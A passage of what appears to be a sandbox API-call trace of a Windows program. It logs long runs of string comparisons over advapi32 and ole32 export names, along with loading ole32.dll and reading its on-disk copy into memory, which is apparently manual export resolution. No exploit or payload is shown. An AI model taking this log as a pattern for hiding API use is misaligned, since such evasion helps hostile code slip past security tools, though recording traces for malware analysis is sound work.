(lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0085.059] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0085.060] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0085.060] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0085.060] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0085.585] GetProcessHeap () returned 0x570000 [0085.585] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db2010 | out: hHeap=0x570000) returned 1 [0085.592] GetProcessHeap () returned 0x570000 [0085.592] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589380 [0085.593] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0085.593] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0085.593] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0085.593] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0085.593] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0085.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0085.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0085.594] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0085.594] GetProcessHeap () returned 0x570000 [0085.594] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x142d00) returned 0x4171040 [0085.597] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0085.597] ReadFile (in: hFile=0x140, lpBuffer=0x4171040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4171040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0085.811] CloseHandle (hObject=0x140) returned 1 [0085.812] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.812] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0085.813] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0085.813] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0085.813] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.813] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.813] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0085.814] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0085.814] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0085.815] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0085.815] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0085.816] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0085.816] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0085.816] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0085.816] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0085.816] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0085.817] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0085.819] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0085.819] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0085.820] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0085.820] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 